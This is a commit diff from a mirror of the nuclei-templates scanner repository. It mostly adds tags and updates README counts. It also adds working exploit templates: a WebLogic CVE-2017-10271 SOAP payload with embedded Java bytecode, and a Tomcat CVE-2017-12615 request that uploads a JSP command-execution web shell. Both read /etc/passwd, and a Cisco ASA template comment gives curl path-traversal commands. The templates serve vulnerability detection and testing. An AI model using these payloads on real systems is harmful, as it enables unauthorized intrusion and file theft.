daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #9 from projectdiscovery/master 

Updation
patch-1
Dhiyaneshwaran 2021-02-13 12:36:00 +05:30 committed by GitHub
parent 75e6dd0579 adb9bcfd0c
commit 810054af71
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
309 changed files with 1214 additions and 279 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
.nuclei-ignore
View File

@ -12,10 +12,6 @@
# More details - https://github.com/projectdiscovery/nuclei#using-nuclei-ignore-file-for-template-exclusion
.pre-commit-config.yaml
cves/2013/CVE-2013-2251.yaml
cves/2017/CVE-2017-7529.yaml
cves/2020/CVE-2020-13379.yaml
cves/2020/CVE-2020-16139.yaml
# Fuzzing is excluded to avoid running bruteforce on every server as default.
fuzzing/

40
README.md
View File

@ -28,13 +28,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts |
| --------------- | ------------------------------- | ---------------- | ------------------------------ |
| cves | 165 | default-logins | 8 |
| cves | 176 | default-logins | 8 |
| dns | 6 | exposed-panels | 74 |
| exposed-tokens | 9 | exposures | 41 |
| exposed-tokens | 9 | exposures | 44 |
| fuzzing | 4 | helpers | 2 |
| miscellaneous | 12 | misconfiguration | 39 |
| takeovers | 1 | technologies | 46 |
| vulnerabilities | 75 | workflows | 17 |
| miscellaneous | 12 | misconfiguration | 40 |
| takeovers | 1 | technologies | 45 |
| vulnerabilities | 81 | workflows | 18 |
**Tree structure of nuclei templates:**
@ -57,7 +57,9 @@ An overview of the nuclei template directory including number of templates assoc
│   │   └── CVE-2014-6271.yaml
│   ├── 2017
│   │   ├── CVE-2017-10075.yaml
│   │   ├── CVE-2017-10271.yaml
│   │   ├── CVE-2017-11444.yaml
│   │   ├── CVE-2017-12615.yaml
│   │   ├── CVE-2017-12637.yaml
│   │   ├── CVE-2017-14537.yaml
│   │   ├── CVE-2017-14849.yaml
@ -86,6 +88,7 @@ An overview of the nuclei template directory including number of templates assoc
│   │   ├── CVE-2018-19439.yaml
│   │   ├── CVE-2018-20824.yaml
│   │   ├── CVE-2018-2791.yaml
│   │   ├── CVE-2018-3167.yaml
│   │   ├── CVE-2018-3714.yaml
│   │   ├── CVE-2018-3760.yaml
│   │   ├── CVE-2018-5230.yaml
@ -116,7 +119,6 @@ An overview of the nuclei template directory including number of templates assoc
│   │   ├── CVE-2019-16278.yaml
│   │   ├── CVE-2019-1653.yaml
│   │   ├── CVE-2019-16662.yaml
│   │   ├── CVE-2019-16759-1.yaml
│   │   ├── CVE-2019-16759.yaml
│   │   ├── CVE-2019-16920.yaml
│   │   ├── CVE-2019-17382.yaml
@ -133,6 +135,7 @@ An overview of the nuclei template directory including number of templates assoc
│   │   ├── CVE-2019-3396.yaml
│   │   ├── CVE-2019-3402.yaml
│   │   ├── CVE-2019-3799.yaml
│   │   ├── CVE-2019-5127.yaml
│   │   ├── CVE-2019-5418.yaml
│   │   ├── CVE-2019-6112.yaml
│   │   ├── CVE-2019-6340.yaml
@ -145,6 +148,7 @@ An overview of the nuclei template directory including number of templates assoc
│   │   ├── CVE-2019-8451.yaml
│   │   ├── CVE-2019-8903.yaml
│   │   ├── CVE-2019-8982.yaml
│   │   ├── CVE-2019-9041.yaml
│   │   ├── CVE-2019-9670.yaml
│   │   ├── CVE-2019-9733.yaml
│   │   ├── CVE-2019-9955.yaml
@ -163,10 +167,12 @@ An overview of the nuclei template directory including number of templates assoc
│   │   ├── CVE-2020-13942.yaml
│   │   ├── CVE-2020-14179.yaml
│   │   ├── CVE-2020-14181.yaml
│   │   ├── CVE-2020-14815.yaml
│   │   ├── CVE-2020-14864.yaml
│   │   ├── CVE-2020-14882.yaml
│   │   ├── CVE-2020-15129.yaml
│   │   ├── CVE-2020-15505.yaml
│   │   ├── CVE-2020-15568.yaml
│   │   ├── CVE-2020-15920.yaml
│   │   ├── CVE-2020-16846.yaml
│   │   ├── CVE-2020-16952.yaml
@ -182,6 +188,7 @@ An overview of the nuclei template directory including number of templates assoc
│   │   ├── CVE-2020-24223.yaml
│   │   ├── CVE-2020-24312.yaml
│   │   ├── CVE-2020-24579.yaml
│   │   ├── CVE-2020-25213.yaml
│   │   ├── CVE-2020-2551.yaml
│   │   ├── CVE-2020-25540.yaml
│   │   ├── CVE-2020-26214.yaml
@ -218,8 +225,12 @@ An overview of the nuclei template directory including number of templates assoc
│   │   ├── CVE-2020-9496.yaml
│   │   └── CVE-2020-9757.yaml
│   └── 2021
│   ├── CVE-2021-22122.yaml
│   ├── CVE-2021-22873.yaml
│   ├── CVE-2021-25646.yaml
│   ├── CVE-2021-26710.yaml
│   ├── CVE-2021-26722.yaml
│   ├── CVE-2021-26723.yaml
│   └── CVE-2021-3019.yaml
├── default-logins
│   ├── activemq
@ -349,6 +360,7 @@ An overview of the nuclei template directory including number of templates assoc
│   │   ├── amazon-docker-config-disclosure.yaml
│   │   ├── ansible-config-disclosure.yaml
│   │   ├── composer-config.yaml
│   │   ├── docker-compose-config.yml
│   │   ├── exposed-svn.yaml
│   │   ├── git-config-nginxoffbyslash.yaml
│   │   ├── git-config.yaml
@ -373,6 +385,8 @@ An overview of the nuclei template directory including number of templates assoc
│   │   ├── ds_store.yaml
│   │   ├── exposed-alps-spring.yaml
│   │   ├── filezilla.yaml
│   │   ├── golang-metrics.yaml
│   │   ├── keycloak-json.yaml
│   │   ├── lazy-file.yaml
│   │   ├── server-private-keys.yaml
│   │   └── xprober-service.yaml
@ -429,12 +443,13 @@ An overview of the nuclei template directory including number of templates assoc
│   ├── larvel-debug.yaml
│   ├── linkerd-ssrf-detect.yaml
│   ├── manage-engine-ad-search.yaml
│   ├── misconfigured-docker.yaml
│   ├── nginx-status.yaml
│   ├── php-errors.yaml
│   ├── php-fpm-status.yaml
│   ├── put-method-enabled.yaml
│   ├── rack-mini-profiler.yaml
│   ├── salesforce-aura-misconfig.yaml
│   ├── salesforce-aura.yaml
│   ├── server-status-localhost.yaml
│   ├── shell-history.yaml
│   ├── sidekiq-dashboard.yaml
@ -460,7 +475,6 @@ An overview of the nuclei template directory including number of templates assoc
│   ├── bigip-config-utility-detect.yaml
│   ├── cacti-detect.yaml
│   ├── clockwork-php-page.yaml
│   ├── couchdb-detect.yaml
│   ├── detect-springboot-actuator.yaml
│   ├── favicon-detection.yaml
│   ├── firebase-detect.yaml
@ -516,9 +530,12 @@ An overview of the nuclei template directory including number of templates assoc
│   │   └── unauthenticated-jenkin-dashboard.yaml
│   ├── jira
│   │   ├── jira-service-desk-signup.yaml
│   │   ├── jira-unauthenticated-adminprojects.yaml
│   │   ├── jira-unauthenticated-dashboards.yaml
│   │   ├── jira-unauthenticated-popular-filters.yaml
│   │   ├── jira-unauthenticated-projectcategories.yaml
│   │   ├── jira-unauthenticated-projects.yaml
│   │   ├── jira-unauthenticated-resolutions.yaml
│   │   └── jira-unauthenticated-user-picker.yaml
│   ├── moodle
│   │   ├── moodle-filter-jmol-lfi.yaml
@ -528,6 +545,7 @@ An overview of the nuclei template directory including number of templates assoc
│   ├── other
│   │   ├── CNVD-2020-62422.yaml
│   │   ├── acme-xss.yaml
│   │   ├── apache-flink-unauth-rce.yaml
│   │   ├── aspnuke-openredirect.yaml
│   │   ├── bullwark-momentum-lfi.yaml
│   │   ├── cached-aem-pages.yaml
@ -562,6 +580,9 @@ An overview of the nuclei template directory including number of templates assoc
│   ├── springboot
│   │   ├── springboot-actuators-jolokia-xxe.yaml
│   │   └── springboot-h2-db-rce.yaml
│   ├── thinkcmf
│   │   ├── thinkcmf-lfi.yaml
│   │   └── thinkcmf-rce.yaml
│   ├── thinkphp
│   │   ├── thinkphp-2-rce.yaml
│   │   ├── thinkphp-5022-rce.yaml
@ -605,12 +626,13 @@ An overview of the nuclei template directory including number of templates assoc
├── springboot-workflow.yaml
├── thinkphp-workflow.yaml
├── vbulletin-workflow.yaml
├── weblogic-workflow.yaml
└── wordpress-workflow.yaml
```
</details>
**55 directories, 508 files**.
**56 directories, 529 files**.
📖 Documentation
-----

1
cves/2005/CVE-2005-2428.yaml
View File

@ -3,6 +3,7 @@ info:
name: CVE-2005-2428
author: CasperGN
severity: medium
tags: cve,cve2005
requests:
- method: GET

1
cves/2008/CVE-2008-2398.yaml
View File

@ -4,6 +4,7 @@ info:
name: AppServ Open Project 2.5.10 and earlier XSS
author: unstabl3
severity: medium
tags: cve,cve2008,xss
requests:
- method: GET

1
cves/2013/CVE-2013-2251.yaml
View File

@ -5,6 +5,7 @@ info:
author: exploitation & @dwisiswant0
severity: critical
description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.
tags: cve,cve2013,rce
requests:
- payloads:

1
cves/2014/CVE-2014-6271.yaml
View File

@ -5,6 +5,7 @@ info:
author: pentest_swissky
severity: high
description: Attempts to exploit the "shellshock" vulnerability (CVE-2014-6271 and CVE-2014-7169) in web applications
tags: cve,cve2014,rce
requests:
- method: GET

1
cves/2017/CVE-2017-10075.yaml
View File

@ -5,6 +5,7 @@ info:
author: madrobot
severity: medium
description: The vulnerability can be used to include HTML or JavaScript code to the affected web page. The code is executed in the browser of users if they visit the manipulated site.
tags: cve,cve2017,xss,oracle
requests:
- method: GET

67
cves/2017/CVE-2017-10271.yaml Normal file
View File

@ -0,0 +1,67 @@
id: CVE-2017-10271
info:
name: CVE-2017-10271
author: dr_set
severity: high
description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.
reference: https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271
tags: cve,cve2017,rce,oracle,weblogic
# Source:- https://github.com/SuperHacker-liuan/cve-2017-10271-poc
requests:
- raw:
- |
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 5178
<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<void class="weblogic.utils.Hex" method="fromHexString" id="cls">
<string>0xcafebabe0000003200670a001700350800360a003700380a0039003a08003b0a0039003c07003d0a0007003508003e0a0039003f0a003900400b004100420800430800440800450800460700470a001100480a001100490a0011004a0a004b004c07004d07004e0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c650100047468697301001e4c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578703b010003736179010029284c6a6176612f6c616e672f537472696e673b294c6a6176612f696f2f496e70757453747265616d3b010003636d640100124c6a6176612f6c616e672f537472696e673b01000769734c696e75780100015a0100056f73547970010004636d64730100104c6a6176612f7574696c2f4c6973743b01000e70726f636573734275696c64657201001a4c6a6176612f6c616e672f50726f636573734275696c6465723b01000470726f630100134c6a6176612f6c616e672f50726f636573733b0100164c6f63616c5661726961626c65547970655461626c650100244c6a6176612f7574696c2f4c6973743c4c6a6176612f6c616e672f537472696e673b3e3b01000d537461636b4d61705461626c6507004f07005001000a457863657074696f6e7307005101000a536f7572636546696c6501000b586d6c4578702e6a6176610c001800190100076f732e6e616d650700520c0053005407004f0c0055005601000377696e0c005700580100136a6176612f7574696c2f41727261794c697374010004244e4f240c0059005a0c005b005c0700500c005d005e0100092f62696e2f626173680100022d63010007636d642e6578650100022f630100186a6176612f6c616e672f50726f636573734275696c6465720c0018005f0c006000610c006200630700640c0065006601001c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578700100106a6176612f6c616e672f4f626a6563740100106a6176612f6c616e672f537472696e6701000e6a6176612f7574696c2f4c6973740100136a6176612f6c616e672f457863657074696f6e0100106a6176612f6c616e672f53797374656d01000b67657450726f7065727479010026284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e673b01000b746f4c6f7765724361736501001428294c6a6176612f6c616e672f537472696e673b010008636f6e7461696e7301001b284c6a6176612f6c616e672f4368617253657175656e63653b295a01000a73746172747357697468010015284c6a6176612f6c616e672f537472696e673b295a010009737562737472696e670100152849294c6a6176612f6c616e672f537472696e673b010003616464010015284c6a6176612f6c616e672f4f626a6563743b295a010013284c6a6176612f7574696c2f4c6973743b295601001372656469726563744572726f7253747265616d01001d285a294c6a6176612f6c616e672f50726f636573734275696c6465723b010005737461727401001528294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0021001600170000000000020001001800190001001a0000002f00010001000000052ab70001b100000002001b00000006000100000007001c0000000c000100000005001d001e00000001001f00200002001a0000016f000300070000009c043d1202b800034e2dc600112db600041205b60006990005033dbb000759b700083a042b1209b6000a99001319042b07b6000bb9000c020057a700441c9900231904120db9000c0200571904120eb9000c02005719042bb9000c020057a700201904120fb9000c02005719041210b9000c02005719042bb9000c020057bb0011591904b700123a05190504b60013571905b600143a061906b60015b000000004001b0000004a001200000012000200130008001400180015001a00180023001a002c001b003c001c0040001d004a001e0054001f00600021006a002200740023007d002600880027008f002800960029001c0000004800070000009c001d001e00000000009c0021002200010002009a00230024000200080094002500220003002300790026002700040088001400280029000500960006002a002b0006002c0000000c0001002300790026002d0004002e000000110004fd001a0107002ffc0021070030231c0031000000040001003200010033000000020034</string>
</void>
<void class="org.mozilla.classfile.DefiningClassLoader">
<void method="defineClass">
<string>com.supeream.exploits.XmlExp</string>
<object idref="cls"></object>
<void method="newInstance">
<void method="say" id="proc">
<string>cat /etc/passwd</string>
</void>
</void>
</void>
</void>
<void class="java.lang.Thread" method="currentThread">
<void method="getCurrentWork">
<void method="getResponse">
<void method="getServletOutputStream">
<void method="writeStream">
<object idref="proc"></object>
</void>
<void method="flush"/>
</void>
<void method="getWriter"><void method="write"><string></string></void></void>
</void>
</void>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
matchers:
- type: regex
regex:
- 'root:[x*]:0:0'
part: body

1
cves/2017/CVE-2017-11444.yaml
View File

@ -5,6 +5,7 @@ info:
author: dwisiswant0
severity: high
description: Subrion CMS before 4.1.5.10 has a SQL injection vulnerability in /front/search.php via the $_GET array.
tags: cve,cve2017,sqli,subrion
# Source:
# - https://mp.weixin.qq.com/s/89mCnjUCvmptLsKaeVlC9Q

50
cves/2017/CVE-2017-12615.yaml Normal file
View File

@ -0,0 +1,50 @@
id: CVE-2017-12615
info:
name: Apache Tomcat RCE
author: pikpikcu
severity: critical
tags: cve,cve2017,apache,rce
reference: https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615
description: |
By design, you are not allowed to upload JSP files via the PUT method on the Apache Tomcat servers.
This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server.
However, due to the insufficient checks, an attacker could gain remote code execution on 7.0.{0 to 79}
Tomcat servers that has enabled PUT by requesting PUT method on the Tomcat server using a specially crafted HTTP request.
requests:
- method: PUT
path:
- "{{BaseURL}}/poc.jsp/"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
<%@ page import="java.util.*,java.io.*"%>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
- method: GET
path:
- "{{BaseURL}}/poc.jsp?cmd=cat+%2Fetc%2Fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
part: body
- type: status
status:
- 200

1
cves/2017/CVE-2017-12637.yaml
View File

@ -5,6 +5,7 @@ info:
author: apt-mirror
severity: high
description: Directory traversal vulnerability in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS in SAP NetWeaver Application Server Java 7.5 allows remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657.
tags: cve,cve2017,sap,traversal
# References:
# - [1] https://www.cvedetails.com/cve/CVE-2017-12637/

1
cves/2017/CVE-2017-14537.yaml
View File

@ -4,6 +4,7 @@ info:
name: trixbox 2.8.0 - directory-traversal
author: pikpikcu
severity: medium
tags: cve,cve2017,trixbox,traversal
# Refrence:-https://nvd.nist.gov/vuln/detail/CVE-2017-14537
# https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/

1
cves/2017/CVE-2017-14849.yaml
View File

@ -5,6 +5,7 @@ info:
author: Random-Robbie
severity: high
description: Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was incompatible with the pathname validation used by unspecified community modules.
tags: cve,cve2017,nodejs,traversal
requests:
- method: GET

1
cves/2017/CVE-2017-5638.yaml
View File

@ -4,6 +4,7 @@ info:
name: "Struts2 RCE "
severity: critical
description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attackers invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
tags: cve,cve2017,struts,rce
# This template supports the detection part only.
# Do not test any website without permission

1
cves/2017/CVE-2017-7391.yaml
View File

@ -5,6 +5,7 @@ info:
author: pikpikcu
severity: medium
description: A Cross-Site Scripting (XSS) was discovered in 'Magmi 0.7.22'. The vulnerability exists due to insufficient filtration of user-supplied data (prefix) passed to the 'magmi-git-master/magmi/web/ajax_gettime.php' URL.
tags: cve,cve2017,magmi,xss
# Issues:-https://github.com/dweeves/magmi-git/issues/522
# Download:-https://github.com/dweeves/magmi-git/releases/download/0.7.22/magmi_full_0.7.22.zip

2
cves/2017/CVE-2017-7615.yaml
View File

@ -5,7 +5,7 @@ info:
author: bp0lr & dwisiswant0
severity: high
description: MantisBT through 2.3.0 allows arbitrary password reset and unauthenticated admin access via an empty confirm_hash value to verify.php.
tags: cve,cve2017,mantisbt
# THIS TEMPLATE IS ONLY FOR DETECTING
# To carry out further attacks, please see reference[2] below.

1
cves/2017/CVE-2017-9506.yaml
View File

@ -5,6 +5,7 @@ info:
author: pd-team
severity: high
description: The IconUriServlet of the Atlassian OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 allows remote attackers to access the content of internal network resources and/or perform an XSS attack via Server Side Request Forgery (SSRF).
tags: cve,cve2017,atlassian,jira,ssrf
requests:
- method: GET

2
cves/2017/CVE-2017-9841.yaml
View File

@ -5,6 +5,8 @@ info:
author: Random-Robbie
severity: high
description: Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a "<?php " substring, as demonstrated by an attack on a site with an exposed /vendor folder, i.e., external access to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php URI
tags: cve,cve2017,php,phpunit,rce
# Reference to exploit
# https://github.com/cyberharsh/Php-unit-CVE-2017-9841
# https://github.com/RandomRobbieBF/phpunit-brute

2
cves/2018/CVE-2018-0296.yaml
View File

@ -4,6 +4,8 @@ info:
name: Cisco ASA path traversal vulnerability
author: organiccrap
severity: medium
tags: cve,cve2018,cisco,traversal
# https://github.com/yassineaboukir/CVE-2018-0296
# curl -k --path-as-is https://host/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions
# if vulnerable, curl -k --path-as-is https://host/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/number

1
cves/2018/CVE-2018-1000129.yaml
View File

@ -5,6 +5,7 @@ info:
author: mavericknerd @0h1in9e
severity: high
description: An XSS vulnerability exists in the Jolokia agent version 1.3.7 in the HTTP servlet that allows an attacker to execute malicious javascript in the victim's browser.
tags: cve,cve2018,jolokia,xss
requests:
- method: GET

4
cves/2018/CVE-2018-11409.yaml
View File

@ -4,8 +4,8 @@ info:
name: Splunk Sensitive Information Disclosure
author: Harsh Bothra
severity: medium
# source:- https://nvd.nist.gov/vuln/detail/CVE-2018-11409
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11409
tags: cve,cve2018,splunk
requests:
- method: GET

4
cves/2018/CVE-2018-11759.yaml
View File

@ -4,8 +4,8 @@ info:
name: Apache Tomcat JK Status Manager Access
author: Harsh Bothra
severity: medium
# Source:- https://github.com/immunIT/CVE-2018-11759
reference: https://github.com/immunIT/CVE-2018-11759
tags: cve,cve2018,apache
requests:
- method: GET

1
cves/2018/CVE-2018-1247.yaml
View File

@ -4,6 +4,7 @@ info:
name: RSA Authentication Manager XSS
author: madrobot
severity: medium
tags: cve,cve2018,xss,flash
requests:
- method: GET

3
cves/2018/CVE-2018-1271.yaml
View File

@ -4,7 +4,8 @@ info:
name: Spring MVC Directory Traversal Vulnerability
author: hetroublemakr
severity: high
# reference: https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d
reference: https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d
tags: cve,cve2018,spring,traversal
requests:
- method: GET

2
cves/2018/CVE-2018-1273.yaml
View File

@ -11,6 +11,8 @@ info:
An unauthenticated remote malicious user (or attacker) can supply
specially crafted request parameters against Spring Data REST backed HTTP resources
or using Spring Datas projection-based request payload binding hat can lead to a remote code execution attack.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-1273
tags: cve,cve2018,vmware,rce
requests:
- payloads:

1
cves/2018/CVE-2018-13379.yaml
View File

@ -4,6 +4,7 @@ info:
name: FortiOS - Credentials Disclosure
author: organiccrap
severity: high
tags: cve,cve2018,fortios
requests:
- method: GET

1
cves/2018/CVE-2018-13380.yaml
View File

@ -7,6 +7,7 @@ info:
description: A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal allows attacker to execute unauthorized malicious script code via the error or message handling parameters.
type: XSS
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-13380
tags: cve,cve2018,fortios,xss
requests:
- method: GET

1
cves/2018/CVE-2018-14574.yaml
View File

@ -4,6 +4,7 @@ info:
name: Django Open Redirect
author: pikpikcu
severity: low
tags: cve,cve2018,django,redirect
requests:
- method: GET

1
cves/2018/CVE-2018-14728.yaml
View File

@ -4,6 +4,7 @@ info:
name: Responsive filemanager 9.13.1 - SSRF/LFI
author: madrobot
severity: high
tags: cve,cve2018,ssrf,lfi
requests:
- method: POST

6
cves/2018/CVE-2018-16341.yaml
View File

@ -4,7 +4,9 @@ info:
name: Nuxeo Authentication Bypass Remote Code Execution
author: madrobot
severity: high
description: Nuxeo Authentication Bypass Remote Code Execution &lt; 103 using a SSTI
description: Nuxeo Authentication Bypass Remote Code Execution < 10.3 using a SSTI
tags: cve,cve2018,nuxeo,ssti,rce
requests:
- method: GET
path:
@ -13,4 +15,4 @@ requests:
- type: word
words:
- "31333333337"
part: body
part: body

1
cves/2018/CVE-2018-16763.yaml
View File

@ -4,6 +4,7 @@ info:
name: fuelCMS 1.4.1 - Remote Code Execution
author: pikpikcu
severity: critical
tags: cve,cve2018,fuelcms,rce
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1

1
cves/2018/CVE-2018-17431.yaml
View File

@ -5,6 +5,7 @@ info:
author: dwisiswant0
severity: critical
description: Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 Remote Code Execution (Web Shell based)
tags: cve,cve2018,comodo,rce
# References:
# - https://www.exploit-db.com/exploits/48825

1
cves/2018/CVE-2018-18069.yaml
View File

@ -5,6 +5,7 @@ info:
author: nadino
severity: medium
description: process_forms in the WPML (aka sitepress-multilingual-cms) plugin through 3.6.3 for WordPress has XSS via any locale_file_name_ parameter (such as locale_file_name_en) in an authenticated theme-localization.php request to wp-admin/admin.php.
tags: cve,cve2018,wordpress,xss
requests:
- method: POST

4
cves/2018/CVE-2018-19386.yaml
View File

@ -4,8 +4,8 @@ info:
name: SolarWinds Database Performance Analyzer 11.1. 457 - Cross Site Scripting
author: pikpikcu
severity: medium
# Refrence:-https://www.cvedetails.com/cve/CVE-2018-19386/
refrence: https://www.cvedetails.com/cve/CVE-2018-19386/
tags: cve,cve2018,solarwinds,xss
requests:
- method: GET

1
cves/2018/CVE-2018-19439.yaml
View File

@ -5,6 +5,7 @@ info:
author: madrobot & dwisiswant0
severity: high
description: XSS exists in the Administration Console in Oracle Secure Global Desktop 4.4 20080807152602 (but was fixed in later versions including 5.4)
tags: cve,cve2018,oracle,xss
requests:
- method: GET

1
cves/2018/CVE-2018-20824.yaml
View File

@ -5,6 +5,7 @@ info:
author: madrobot & dwisiswant0
severity: medium
description: The WallboardServlet resource in Jira before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the cyclePeriod parameter.
tags: cve,cve2018,atlassian,jira,xss
requests:
- method: GET

2
cves/2018/CVE-2018-2791.yaml
View File

@ -5,6 +5,8 @@ info:
author: madrobot
severity: medium
description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware
tags: cve,cve2018,oracle,xss
requests:
- method: GET
path:

25
cves/2018/CVE-2018-3167.yaml Normal file
View File

@ -0,0 +1,25 @@
id: CVE-2018-3167
info:
name: Unauthenticated Blind SSRF in Oracle EBS
author: geeknik
severity: low
description: https://medium.com/@x41x41x41/unauthenticated-ssrf-in-oracle-ebs-765bd789a145
tags: cve,cve2018,oracle,ebs,ssrf
requests:
- method: POST
path:
- '{{BaseURL}}/OA_HTML/lcmServiceController.jsp'
body: <!DOCTYPE root PUBLIC "-//B/A/EN" "http://localhost:80">
matchers-condition: and
matchers:
- type: word
words:
- 'Unexpected text in DTD'
part: body
- type: status
status:
- 200

2
cves/2018/CVE-2018-3714.yaml
View File

@ -3,6 +3,8 @@ info:
name: node-srv Path Traversal
author: madrobot
severity: high
reference: https://hackerone.com/reports/309124
tags: cve,cve2018,nodejs,traversal
requests:
- method: GET

1
cves/2018/CVE-2018-3760.yaml
View File

@ -4,6 +4,7 @@ info:
name: Rails CVE-2018-3760
author: 0xrudra
severity: high
tags: cve,cve2018,rails,traversal
requests:
- method: GET

1
cves/2018/CVE-2018-5230.yaml
View File

@ -4,6 +4,7 @@ info:
name: Atlassian Confluence Status-List XSS
author: madrobot
severity: medium
tags: cve,cve2018,atlassian,confluence,xss
requests:
- method: GET

1
cves/2018/CVE-2018-7251.yaml
View File

@ -4,6 +4,7 @@ info:
name: AnchorCMS Error Log Exposure
author: pd-team
severity: medium
tags: cve,cve2018,anchorcms,logs
requests:
- method: GET

1
cves/2018/CVE-2018-7490.yaml
View File

@ -4,6 +4,7 @@ info:
name: uWSGI PHP Plugin Directory Traversal
author: madrobot
severity: high
tags: cve,cve2018,uwsgi,php,traversal
requests:
- method: GET

1
cves/2018/CVE-2018-8006.yaml
View File

@ -4,6 +4,7 @@ info:
name: Apache ActiveMQ XSS
author: pd-team
severity: medium
tags: cve,cve2018,apache,activemq,xss
requests:
- method: GET

1
cves/2018/CVE-2018-8033.yaml
View File

@ -5,6 +5,7 @@ info:
author: pikpikcu
severity: high
description: XXE injection (file disclosure) exploit for Apache OFBiz 16.11.04
tags: cve,cve2018,apache,ofbiz,xxe
requests:
- raw:

1
cves/2019/CVE-2019-10092.yaml
View File

@ -4,6 +4,7 @@ info:
name: Apache mod_proxy HTML Injection / Partial XSS
author: pd-team
severity: medium
tags: cve,cve2019,apache,htmli
requests:
- method: GET

3
cves/2019/CVE-2019-1010287.yaml
View File

@ -4,8 +4,9 @@ info:
name: Timesheet 1.5.3 - Cross Site Scripting
author: pikpikcu
severity: high
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-1010287
tags: cve,cve2019,timesheet,xss
# Refrence:-https://nvd.nist.gov/vuln/detail/CVE-2019-1010287
# Google-Dork: inurl:"/timesheet/login.php"
# Demo: http://www.mdh-tz.info/

1
cves/2019/CVE-2019-10475.yaml
View File

@ -4,6 +4,7 @@ info:
name: Jenkins build-metrics plugin 1.3 - 'label' Cross-Site Scripting
author: madrobot
severity: medium
tags: cve,cve2019,jenkins,xss
requests:
- method: GET

1
cves/2019/CVE-2019-11248.yaml
View File

@ -4,6 +4,7 @@ info:
name: exposed_pprof
author: 0xceeb
severity: medium
tags: cve,cve2019,debug
# https://medium.com/bugbountywriteup/my-first-bug-bounty-21d3203ffdb0
# http://mmcloughlin.com/posts/your-pprof-is-showing

3
cves/2019/CVE-2019-11510.yaml
View File

@ -4,7 +4,8 @@ info:
name: Pulse Connect Secure SSL VPN arbitrary file read vulnerability
author: organiccrap
severity: high
# https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html
reference: https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html
tags: cve,cve2019,pulsesecure,traversal
requests:
- method: GET

1
cves/2019/CVE-2019-11580.yaml
View File

@ -4,6 +4,7 @@ info:
